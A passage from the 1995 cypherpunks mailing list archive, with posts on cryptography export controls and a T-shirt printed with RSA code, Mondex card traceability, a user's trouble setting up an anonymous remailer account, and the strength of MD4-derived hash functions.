In order not for some silly thread but, rather, for a meticulously
documented CJR, with an eye toward slowly upping the ante: submit the exact
same code in a variety of less and less absurd formats until the USG
chooses to deal with it--all the while presuming that their failure to
consider a CJR in this or that format constituted a de facto approval for
export.

ted






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Erik Bataller <bataller@eit.COM>
Date: Thu, 26 Oct 1995 19:41:17 +0800
To: cypherpunks@toad.com
Subject: ANNOUNCEMENT: sepp-talk mailing list
Message-ID: <Pine.SOL.3.91.951026042253.12008C-100000@viper>
MIME-Version: 1.0
Content-Type: text/plain


The sepp-talk mailing list is a forum for comments and discussion
regarding the Secure Electronic Payment Protocol (SEPP), proposed 
by MasterCard to support credit card payments over the Internet.
The SEPP specification is available for review from the MasterCard 
home page:

    http://www.mastercard.com

The CommerceNet consortium operates this mailing list as a service 
to the Internet community.

To subscribe to the sepp-talk mailing list, send email to:

                majordomo@commerce.net

...with a message body of:

                subscribe sepp-talk <your full name>

You should receive a confirmation message which includes instructions 
for unsubscribing from the list.

Shortly, CommerceNet will provide a WWW archive of this list on it's 
server.  A notice will be sent to the mailing list.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 26 Oct 1995 23:23:27 +0800
To: cypherpunks@toad.com
Subject: Re: [Noise] Paranoia in the Comics
Message-ID: <199510261014.GAA22116@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:27 PM 10/25/95 -0700, you wrote:
>This has no real crypto relevance, but some anarchistic relevance.
>
>Sometimes you find anti-government paranoia in the strangest of places...
>In the Ziggy strip for 10/25/95, Ziggy is in a Psychiatrist's office.  The
>shrink is stating "You're afraid of the government, are you?  I'm required
>to report that sort of thing you know."

Ziggy has long been a libertarian/right winger.  Note a Sunday strip of a
few years ago.  Ziggy bends over and looks closely at some red ants who are
carrying picket signs reading "Down with Communism", "Freedom Now", etc.
Ziggy observes "It had to happen sometime."

Since we are being semi-irrelevant here, yesterday's Broom Hilda strip was
good for the net "Universal Access" wars.  Broom Hilda sits down at a
computer to take a ride on the Information Superhighway.  The computer says
"Sorry, the information superhighway is a toll road."  "What's the toll"?
"Brains."  So Broom Hilda gives up and sets off on a tour of the back roads
of America.

Note the proof that competition provides better service than
government-monopoly Universal Service.  After years of being one of the few
Local Telcos that charged residential customers metered rates for local
calls, NYNEX (New York Telephone) has announced some flat rate pricing
plans.  Nothing like a little local loop competition.   

DCF

"School Bus Safety - Are your children safe? - Story at 11:00" -- They're
safer on the bus than they are when they arrive at their local institution
for the mentally/morally defective.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous User <remailer-admin@ideath.goldenbear.com>
Date: Fri, 27 Oct 1995 11:26:07 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199510261340.AA15989@ideath.goldenbear.com>
MIME-Version: 1.0
Content-Type: text/plain




_______________________


Copyright EMAP Computers, 1995


             Network Week, London, Vol 1 No. 8,  
                      25 October 1995

                         Page 1 Lead


     Electronic cash card system faces possible legal
                          action


               MONDEX BLOWS USERS ANONYMITY

             By Gavin Clarke and Madeleine Acey



Mondex faces possible legal action after admitting
transactions made with its supposedly anonymous
electronic cash cards can be traced.

Launched in December by Natwest, Midland and BT,
the electronic card was promoted as easy to use and
as anonymous as cash, with no trace being left. It
was perceived that a significant percentage of the
public avoided credit and debit cards because they
preferred their spending habits to remain private.

Simon Davies, Visiting Professor of Law at Essex
University, has lodged a complaint with the Trading
Standards Board demanding that Mondex change
either the retailers card readers or its promotional
material.

It has been revealed that the readers keep records of
up to 500 cards identities. The customers can keep
a record of ten transactions.

The retailer sends the money to the bank through a
9,600 modem-based Mondex phone

Rob Jameson, Mondex project manager for the pilot
in Swindon, said we can certainly trace where cards
have been used.

There are degrees of control that Im not prepared to
discuss.  There are other mechanisms in place but I
dont want to go into that.

Davies said this contradicted previous Mondex
publicity material. It said In everyday use Mondex
transactions are anonymous, just like cash 

A Mondex spokesperson denied last week that the
company said its card offered anonymity. But the
same spokesperson said in February 1994 that the
cards anonymity would appeal to those with a
cash psychology, such as cab drivers and other
cash-in-hand business people.

Mondex entered a new phase last week with the
launch of specially designed public telephones that
will allow its 8,000 Swindon trial customers to
re-load their cards from their bank accounts.

The Data Protection Registrar said people using
Mondex and other smart cards should be made
aware of the uses to which their card information will
go.

----------

Photo of Mondex promotional material and caption :
Mondex card use can be traced, despite claims of
anonymity.

ends


--








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stevenw@best.com (Steven Weller)
Date: Fri, 27 Oct 1995 01:23:03 +0800
To: patrick@Verity.COM (Patrick Horgan)
Subject: Re: Welcome to cypherpunks
Message-ID: <v01530500acb554f900b0@[206.86.1.35]>
MIME-Version: 1.0
Content-Type: text/plain



>>      Why am I getting this when I am already subscribed to the
>>list??????
>
>Because someone signed the list up to the list...probably inadvertently.
>They probably sent something to majordomo with a line like:
>
>subscribe cypherpunks cypherpunks@toad.com
>
>thinking it actually made sense for some reason...then again they might
>have done it on purpose.

Well, the Welcome message says this:

->If you ever want to remove yourself from this mailing list,
->you can send mail to "Majordomo@toad.com" with the following command
->in the body of your email message:
->
->    unsubscribe cypherpunks cypherpunks@toad.com

So it is but a small leap of logic to remove the 'un' in order to
subscribe, since to my knowlege the Welcome message does not tell you how
to subscribe. A human interface problem?


-------------------------------------------------------------------------
Steven Weller                      |  "The Internet, of course, is more
+1 415 390 9732                    |  than just a place to find pictures
                                   |  of people having sex with dogs."
stevenw@best.com                   |       -- Time Magazine, 3 July 1995






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 27 Oct 1995 01:33:44 +0800
To: cypherpunks@toad.com
Subject: Re: CJR returned to sender
In-Reply-To: <acb323bd030210041822@[205.199.118.202]>
Message-ID: <199510261423.HAA10098@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Jeff Weinstein <jsw@netscape.com> writes:

>  Should they also reject the same content (RSA-PERL) delivered
>in any of the following ways:

>	Printed on paper
>	Printed on paper in OCR font
>	Printed on paper in barcode
>	Printed on paper with magnetic ink (like checks)

>  The lines being drawn here seem very arbitrary.

But lines are always arbitrary.  I posted about this a long time ago: it
is assault to hit a man with a baseball bat, but presumably not to hit
him with a feather.  Should we then ask if it is assault to hit him with
a straw hat, with a pillow, with a loaf of bread?  The lines which will
end up being drawn will also be quite arbitrary.  The line between day
and night is arbitrary but that does not mean that there is no difference
between day and night.  This whole exercise in line-drawing doesn't seem
that productive to me.

The appellate court has already ruled that restrictions on export of
printed materials do not violate First Amendment rights.  I wrote up one
of these, the Posey case, in
<URL:http://www.portal.com/~hfinney/cryp_export2.html>.  In that instance
the materials being exported were some manuals obtained from the US
government itself via the Freedom of Information Act!  The law in
question was not actually the ITARs but rather another one which applied
specifically to exports to South Africa, and which did not have the
public domain exemption.  The point though is that the court did not agree
that the First Amendment was relevant since the restrictions were
specifically on export and did not have any effect on domestic
distribution of the information.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Thu, 26 Oct 1995 19:41:12 +0800
To: Cypherpunks <froomkin@law.miami.edu>
Subject: Re: CJR returned to sender
In-Reply-To: <Pine.SUN.3.91.951025100419.15559D-100000@viper.law.miami.edu>
Message-ID: <m0t8QPi-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


Michael Froomkin writes:

: I agree strongly with Tim May that this (fun) little joke has gone far
: enough.  I enjoyed it while it lasted, but the CJR was clearly frivolous,
: the T-Shirt was clearly not a munition, IMHO, and that's that.  Write up
: the experience, post it on the web somewhere (I'll provide a space if you
: need it), and call it a day. 

I am afraid that I have to disagree with this.  The T-Shirt, or rather
the cryptographic software that is disclosed by the wearing of the
shirt, is just as much an item that falls within the ITAR's definition
of an item on the United States Munitions List as any other
cryptographic software.  The only way that wearing the T-Shirt without
a license from the censors in the Office of Defense Trade Controls
would _not_ be a violation of the ITAR would be if either (i) the
censors, in their totally arbitrary discretion issue a commodity
jurisdiction determination that the T-Shirt is not an item on the
United States Munitions List or (ii) the ITAR are determined to be
unconstitutional.

There is no exception in the ITAR for printed materials.  The fact
that in one case a book got a favorable commodity jurisdiction
determination and a CDrom did not is not evidence to the contrary, it
just shows how completely arbitrary the the ODTC's commodity
jurisdiction determinations are.  Nor is there an exception in the
ITAR for T-Shirts.

Of course the cryptographic software on the T-Shirt is constitutionally
protected, so it is not, in the constitutional sense, a violation of any
law to wear the shirt in the presence of a foreigner.  But then it
wouldn't be a violation--in the constitutional sense--for me to disclose
that cryptographic program to the foreigner who wrote it in a
communication over the internet.  And I assure you that when I have
discussed their encryption programs with foreign authors by e-mail I
have always been very careful not to disclose their own programs to
them.

It may not have much to do with cryptography, but it has everything to
do with the First Amendment to the United States Constitution, that
speech in any form, even on the backs of T-Shirts, is protected.
Remember there is a leading First Amendment case involving a T-Shirt
inscribed with the immortal words:  ``Fuck the Draft''.

Even if requiring one to obtain a license, or a non-obstat, from the
censors before communicating cryptographic software to foreign persons
by publishing that software were not to be held unconstitutional per
se, a licensing scheme that does provide any way to get a license for a
T-Shirt or a book is clearly unconstitutional.  The government cannot
refuse to license speech simply because the medium on which the speech
is affixed is frivolous.

And the message communicated by the T-Shirt is clearly political, so
arguably that message is _more_ protected by the First Amendment than
the PGP program on a floppy disk.

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Thu, 26 Oct 1995 20:04:43 +0800
To: cypherpunks@toad.com
Subject: FBI/CIA/NSA, let's merge them all into one.  [???!!!]
Message-ID: <Pine.SOL.3.91.951026074229.1987G-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain


AP on 10/25/95:
 
FBI Gets CIA Help On Olympics

The FBI and CIA are working together to deal with "substantial" 
threats to security at next summer's Atlanta Olympics, top
administration officials told senators Wednesday. 

[...]

Sen. Bob Kerrey of Nebraska ... chided the FBI for seeking to 
build a $37 million code encryption  center that he said 
would duplicate facilities operated by the National Security 
Agency. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Fri, 27 Oct 1995 02:46:01 +0800
To: cypherpunks@toad.com
Subject: Re: Fred, Fred, Fred: Enough already!
Message-ID: <199510261505.IAA08725@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 11:58 AM 10/24/95 -0400, Robert Hettinga wrote:
> Can we please talk to Dr. Fred, the Poster Child of the Informal Fallacy,
> if we *really* have to, off line?

Yes, please, will everyone please killfile Dr Fred.  I am tired of seeing
things that are glaringly obvious explained in painful detail to someone
who is reluctant to understand them.


 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Thu, 26 Oct 1995 20:27:32 +0800
To: www-buyinfo@allegra.att.com
Subject: Re: Let's Not Merge Mailing Lists, OK?
Message-ID: <v02120d01acb51bcb6fbf@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



I'm cc:-ing this to both lists just this once, because this message is more
or less administrative. I'm not trying to merge www-buyinfo with
cypherpunks.

tcmay@got.net (Timothy C. May) said:

>There is great danger in constantly "casting the net wider," in trying to
>reach more and more people. I understand the temptation for some on both
>lists to cross-post some messages. I urge that they do this, as Bob H. has
>done on occasion, by personally forwarding the message, with only _one_ of
>the lists getting it. (This because the real danger is as above, where
>multiple lists are in the recipient or cc: fields, and followups semi-spam
>multiple lists.)

I agree with Tim.

I've been doing one-way forwards from cypherpunks to www-buyinfo for most
of a year now.  Most of the people on www-buyinfo are business people who
understand that digital commerce *is* financial cryptography, but they
don't have time to read all of cypherpunks to find the e$ juicy-bits. When
I do this, I put a "(cpx)" in the subject line so that the sizable
community of cypherpunks on www-buyinfo can filter them out and won't have
to see double. I've gotten a lot of fan-mail for this, even though it's not
really in keeping with the original charter for www-buyinfo, which seems to
have been subsumed by other groups, like the e-payments list and others.
Recently Dave Kristol has said that he's going to retool www-buyinfo, and
when he does, I'm hoping to have set up my own structure of 3 hypermail
archived e$ lists (a netwide e$ digest, a discussion list, and a
newsletter). I'm talking to about 3 or 4 different people about it, and I
should have the details worked out within a few days, with an announcement
next week, if I'm lucky.

Anyway, I've sent a few messages in the opposite direction on occasion
(from www-buy to c'punx), but I do try to hold it down, mostly because
whatever the topic is, we've usually talked about it on cypherpunks before.
I should note, however, that there's a good-sized discussion, for www-buy,
anyway, going on over on over there about anonymity, which has heated up
over the past few days. I forwarded a message here from Nick Szabo as an
example of it yesterday. The cross-posting Tim's talking about is a result
of that discussion.

There's a whole lot of "what do we need anonymity for, anyway?" opinion in
the business community, and it should be addressed with as much reason as
possible, and not by shouting them down with moral arguments to the
contrary, no matter how right those moral arguments are. Fortunately, I
believe there's a great business case for anonymity, and frankly, there had
better be, because, in a cryptoanarchic geodesic economy like the one we're
fixing to have, nothing is going to survive without a market.

Anyway, like I said, I agree with Tim.  If you want to post to cypherpunks,
you should subscribe to cypherpunks, and suffer the firehose like the rest
of us have to do. However, those of us who are on both lists, especially
those of us longer-term cypherpunks like Hal, and Nick, and Adam Shostack,
should be the ones to forward messages, if any, to cypherpunks, because
they are the ones who know whether cypherpunks has seen this before.  For
instance, the posting of Nick Szabo's that I sent to cypherpunks was more
of a rah-rah exercise (no pun intended) than anything else. It was so well
thought out that I thought it bore passing around a bit. However, as an
actual contribution to the information content on cypherpunks, what Nick
said has been said on cypherpunks before, if not typically with such
eloquence.

Cheers,
Bob Hettinga



-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hroller <hroller@metronet.com>
Date: Thu, 26 Oct 1995 21:34:45 +0800
To: admin@alpha.c2.org
Subject: Anonymous Account Help
Message-ID: <Pine.HPP.3.90.951026075541.25974C-100000@fohnix.metronet.com>
MIME-Version: 1.0
Content-Type: text/plain


I have been having problems trying to set up an account at
alpha.c2.org. I have followed all the instructions but am still unable to
get a reply or anything that works right. What I am doing wrong? This is 
what I have done so far. I am about to pull my hair out. I have been 
working on this for 2 days now. Anyway, 

1. Created a Reply Block like this:  
Request-Remailing-To: hroller@metronet.com 

2. I then encrypted it with remailer@replay.com's Public Key. I prepended it
with the "Encrypted: PGP".  

3. I then created the following message: 

From: hroller@alpha.c2.org 
Password: MyPassword 
Reply-Block: 
::
Anon-To: remailer@replay.com 

::
Encrypted: PGP 
-------Begin PGP Message---------- 
"The Encrypted Reply Block Message"  
------End PGP Message------------- 

4. I then sent it to "alias@alpha.c2.org".  

Then I wait. But never get anything from alpha.c2.org.  I have gotten 
some anonymous messages from replay, but they are still encrypted so 
I don't know what it is sending me. Any help you can supply would be
greatly appreciated.


hroller





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 26 Oct 1995 20:35:34 +0800
To: Alan Olsen <alano@teleport.com>
Subject: Re: [Noise] Paranoia in the Comics
In-Reply-To: <199510260626.XAA04340@desiree.teleport.com>
Message-ID: <199510261213.IAA11138@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Alan Olsen writes:
> This has no real crypto relevence, but some anarchistic relevence.

Alan;

As much as I found the comment interesting, it probably belonged
somewhere like libernet-d, not here on cypherpunks.

[I'm posting this in public, as I do about one in ten such messages,
so that a wider audience of people will be discouraged from posting
such things in advance. Don't bother mailing me a message saying "you
are adding to the noise yourself, why not mail in private" -- I do
that 90% of the time. Sometimes the nose levels rise enough that I
feel that a few public mentions would do some good.]

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard.Johnson@Colorado.EDU (Richard Johnson)
Date: Fri, 27 Oct 1995 02:36:20 +0800
To: cypherpunks@toad.com
Subject: Re: CJR returned to sender
Message-ID: <v02130501acb4edcd6bab@[204.131.233.49]>
MIME-Version: 1.0
Content-Type: text/plain


Michael Froomkin wrote:
>I agree strongly with Tim May that this (fun) little joke has gone far
>enough.  I enjoyed it while it lasted, but the CJR was clearly frivolous,
>the T-Shirt was clearly not a munition, IMHO, and that's that.  Write up
>the experience, post it on the web somewhere (I'll provide a space if you
>need it), and call it a day. 

The CJR for the t-shirts was not frivolous.  Not in the least.

Letting the NSA/Dept. of State off the hook on this one leaves them with
wiggle room.  The goal of filing these CJRs is to find out just where the
NSA/Dept. of State draw their lines, and to _force_ them to draw lines
where they'd rather retain flexibility.  At the very least, we can point
out the rather strange ideas they have about what constitutes speech, for
the PR value, during the splashes of media attention silly CJR rulings
generate.

Even more useful: other things remaining equal, a rigid agency is safer
to deal with than one that retains the flexibility to selectively harrass.


Richard






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: +*+ Billy Smith <bsmith@gears.efn.org>
Date: Fri, 27 Oct 1995 11:19:19 +0800
To: hroller <hroller@metronet.com>
Subject: Re: Anonymous Account Help
In-Reply-To: <Pine.HPP.3.90.951026075541.25974C-100000@fohnix.metronet.com>
Message-ID: <Pine.3.89.9510260836.A28986-0100000@gears.efn.org>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 26 Oct 1995, hroller wrote:

> I have been having problems trying to set up an account at
> alpha.c2.org. I have followed all the instructions but am still unable to
> get a reply or anything that works right. What I am doing wrong? This is 
> what I have done so far. I am about to pull my hair out. I have been 
> working on this for 2 days now. Anyway, 
> 
> 1. Created a Reply Block like this:  
> Request-Remailing-To: hroller@metronet.com 
> 
> 2. I then encrypted it with remailer@replay.com's Public Key. I prepended it
> with the "Encrypted: PGP".  
> 
> 3. I then created the following message: 
> 
> From: hroller@alpha.c2.org 
 > Password: MyPassword 
> Reply-Block: 
> ::
> Anon-To: remailer@replay.com 
> 
> ::
> Encrypted: PGP 
> -------Begin PGP Message---------- 
> "The Encrypted Reply Block Message"  
> ------End PGP Message------------- 
> 
> 4. I then sent it to "alias@alpha.c2.org".  
> 
> Then I wait. But never get anything from alpha.c2.org.  I have gotten 
> some anonymous messages from replay, but they are still encrypted so 
> I don't know what it is sending me. Any help you can supply would be
> greatly appreciated.
> 
>Humm, If you got an encryped return from alpha.c2.org that means that 
your request worked. Use the password you sent to them to decrypt the msg 
you received... I spent alot of days waiting for something to happen when 
I first registered, I think the name or password I was trying to use had 
already been used. If that is the case, alpha.c2.org dosn't respond at 
all. It took me awhile to figure that out. Once I selected a name and 
password that no one else was using... It worked...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Fri, 27 Oct 1995 04:16:52 +0800
To: hroller@metronet.com (hroller)
Subject: Re: Anonymous Account Help
In-Reply-To: <Pine.HPP.3.90.951026075541.25974C-100000@fohnix.metronet.com>
Message-ID: <199510261609.JAA27301@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Then I wait. But never get anything from alpha.c2.org.  I have gotten 
> some anonymous messages from replay, but they are still encrypted so 
> I don't know what it is sending me. Any help you can supply would be
> greatly appreciated.
> 

	Mail to your alias is encrypted using pgp -c and your
password, I think.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 27 Oct 1995 03:50:35 +0800
To: cypherpunks@toad.com
Subject: Re: Welcome to cypherpunks
Message-ID: <acb4fc6a06021004fab7@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:16 PM 10/26/95, Steven Weller wrote:

>Well, the Welcome message says this:

Actually, not "the" Welcome message, but a particular instance of it,
namely, the instance directed at the new subscriber (in this case,
cypherpunks@toad.com was the new subscriber).


>->If you ever want to remove yourself from this mailing list,
>->you can send mail to "Majordomo@toad.com" with the following command
>->in the body of your email message:
>->
>->    unsubscribe cypherpunks cypherpunks@toad.com
>
>So it is but a small leap of logic to remove the 'un' in order to
>subscribe, since to my knowlege the Welcome message does not tell you how
>to subscribe. A human interface problem?

Except that the list would _have_ to have been subscribed to itself
_before_ that particular Welcome message would have gone out.

Sort of a binding issue. I would prefer the Welcome message to always say
the command is:

     unsubscribe cypherpunks yournamehere

and

     subscribe cypherpunks yournamehere



But this is presumably a Majordomo feature. In any case, let's hope
subscribing the list to itself is not a trend.


--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 27 Oct 1995 04:47:59 +0800
To: cypherpunks@toad.com
Subject: Re: CJR returned to sender
Message-ID: <acb4fe74070210047537@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:30 AM 10/26/95, Jeff Weinstein wrote:

>  Should they also reject the same content (RSA-PERL) delivered
>in any of the following ways:
>
>        Printed on paper
>        Printed on paper in OCR font
>        Printed on paper in barcode
>        Printed on paper with magnetic ink (like checks)
>
>  The lines being drawn here seem very arbitrary.

I'll try to think like a bureaucrat responsible for actually trying to
limit the export of weapons, munitions, cluster bombs, nerve gases, secure
communications gear, crypto tools, etc.

My test would be this:

"Is the product actually usable by an adversary or helpful to them in any
major way as a tangible product?"

(I have no idea of what their review criteria are, just suggesting some
plausible considerations.)

How different products get evaluated by these criteria:

* cruise missiles -- Yes.

* designs for cruise missiles -- Yes. Blueprints, especially. Books are
more problematic, as the U.S. has no tendency to screen books for
publication, and no border checks for books. (Not that outgoing luggage
ever gets checked anyway.)

* functional crypto systems, such as RSA products or PGP -- Yes, thinking
as a bureaucrat. (I won't argue the effectiveness of such steps, or the
ultimate futility of trying to control software export.)

* "RSA in Perl," even in machine-readable form. I would not block export of
it, as it is not a "usable system" (no key management, unwieldy to use).
The proof of the pudding: how many people are using "RSA in Perl" to
actually communicate? How many Pablo Escobars or Saddam Husseins are likely
to ever use it?

(If the argument that the few lines of RSA in Perl "give away" the secret
of RSA, this is bogus. The core steps are widely, widely (did I say
"widely") known, and are standard programming examples. One of the first
things I did in Mathematica, several years ago, was to code up "RSA in
Mathematica"...took about 15 lines, without much effort to compact it.)

* "RSA in Perl" on an unreadable t-shirt. Yes. Yes, thinking as a
bureaucrat I would certainly approve it. Or try to lose it, return it
unopened, etc., knowing full well the CJR was being done as a publicity
stunt (well, isn't it?) and that reporters were waiting to make the State
Department look foolish by reporting: "State Department Rules "Munitions
T-Shirt" May Be Exported!"

(Or to look just as foolish by rejecting it.)


--Tim May


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Fri, 27 Oct 1995 06:17:50 +0800
To: cypherpunks@toad.com
Subject: Re: CJR returned to sender
In-Reply-To: <acb323bd030210041822@[205.199.118.202]>
Message-ID: <308FBACB.581A@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Hal wrote:
> The appellate court has already ruled that restrictions on export of
> printed materials do not violate First Amendment rights.  I wrote up one
> of these, the Posey case, in
> <URL:http://www.portal.com/~hfinney/cryp_export2.html>.  In that instance
> the materials being exported were some manuals obtained from the US
> government itself via the Freedom of Information Act!  The law in
> question was not actually the ITARs but rather another one which applied
> specifically to exports to South Africa, and which did not have the
> public domain exemption.  The point though is that the court did not agree
> that the First Amendment was relevant since the restrictions were
> specifically on export and did not have any effect on domestic
> distribution of the information.

  The ITARs are currently keeping us(Netscape) from distributing
our US-only products to people within the United States.  We have
asked for clarification from the government about network distribution,
such as how much verification of location and citizenship of the
recipient we must do, and have yet to receive a response.  That
makes it more than just an export issue, at least for us.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 26 Oct 1995 16:53:36 +0800
To: cypherpunks@toad.com
Subject: Bill Gates on anonymity
Message-ID: <199510260845.JAA17457@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


BEGIN QUOTE

I'm not suggesting we do away with all forms of anonymity. I can imagine electronic 
communities where anything goes and no one can trace the real origin of 
information - or verify its authenticity. 

You would enter such a community - by deciding to read or watch the information
posted there - at your own risk, and if people said offensive or untrue things to 
you, your only recourse would be to set the record straight in the same forum. 

Consenting adults should be entitled to participate in this kind of community. But 
kids certainly should not. 

END QUOTE

The full text is at http://nytsyn.com/live/Gates/270_092795_082520_2997.html







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JMKELSEY@delphi.com
Date: Thu, 26 Oct 1995 23:53:01 +0800
To: cypherpunks@toad.com
Subject: MD4-derived hash functions
Message-ID: <01HWW4G5KUE69LV2GV@delphi.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Date: Tue, 24 Oct 1995 13:14:41 -0400
>From: hallam@w3.org
>Subject: Re: MD5 weakness

>Ron has not mentioned such an event to me and if that were the case I would
>seriously doubt that he would not have been told about it. The only comment he
>generally makes is that he wrote MD5 because "MD4 was making me nervous".

In the MD5 RFC, I seem to recall the statement that MD4 was trading
off too much strength for additional speed.  However, sometime
around that time, it came out that there were attacks on two-round
variants of MD4, which is the stated reason for the development of
RIPE-MD.  Does anyone know whether Rivest was motivated to design
MD5 by the partial attacks on MD4, or whether those came later?
(This is totally idle curiousity.)

>NIST and the NSA trusted MD4 sufficiently to base SHA upon it. SHA is preferable
>in many ways to MD5, it has a different approach to extending the scheduling and
>resist differential cryptanalysis. There is a problem with the compressor
>function of MD5 which I dislike.

All of the well-known software hash functions seem to be based on
MD4 these days, but that doesn't mean much about the security of
MD4--3DES with three independent keys looks pretty strong, as does
3DES with two independent keys, but that doesn't mean that single
DES is a strong enough cipher for modern applications.

One issue that exists with MD5, but not with SHA or the longer hash
versions of Haval, is that MD5 has only a 128 bit hash function
output, which corresponds loosely to having a 64-bit key.  This
implies that a wealthy enough opponent could determine a pair of MD5
inputs that collide, and conceivably use this in an attack.  I think
we should stick to 160 bit or longer hashes for future designs.
(See P. van Oorschot and M. Weiner, "Parallel Collision Search with
Application to Hash Functions and Discrete Logarithms," in the
proceedings of the 1994 Fairfax Conference, for example).

As an aside, what hash functions are there out there that look
reasonably strong, have hash outputs of at least 160 bits, and
aren't based on MD4?  Some of the Snefru variants with many passes
(eight?) come to mind, and the GOST hash function fits all the
criteria, except I have a hard time convincing myself it's as strong
as it claims to be.  Is there a generic construction for
arbitrary-length hash functions from good block or stream ciphers?

>	Phill

   --John Kelsey, jmkelsey@delphi.com
 PGP 2.6 fingerprint = 4FE2 F421 100F BB0A 03D1 FE06 A435 7E36

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMI+Mc0Hx57Ag8goBAQFJ9gP/VMvNefSm77prSY/NMbJfGO1EVmQrUAHn
kEQEse+cXiaoJTe7njxUqycuDX0PN09C4XhNVOQJ6IBpCPZOKQMiXsI9FwAfjGWb
mibwSfzyiXwxny1kYgfDCffS8KwdlWiVjxj1+MhvqhGQnxPsVA6UVrSCyAyHPZVJ
UTXUWBJlJho=
=2Pti
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Fri, 27 Oct 1995 15:05:48 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: CJR returned to sender
In-Reply-To: <acb4fe74070210047537@[205.199.118.202]>
Message-ID: <199510261708.KAA01761@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> * "RSA in Perl," even in machine-readable form. I would not block export of
> it, as it is not a "usable system" (no key management, unwieldy to use).
> The proof of the pudding: how many people are using "RSA in Perl" to
> actually communicate? How many Pablo Escobars or Saddam Husseins are likely
> to ever use it?

	They have, however (apparently) blocked export of the
"snuffle" source code, which is 10 lines of C. Is snuffle, in its 10
lines of C a "usable system"? I would imagine not.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
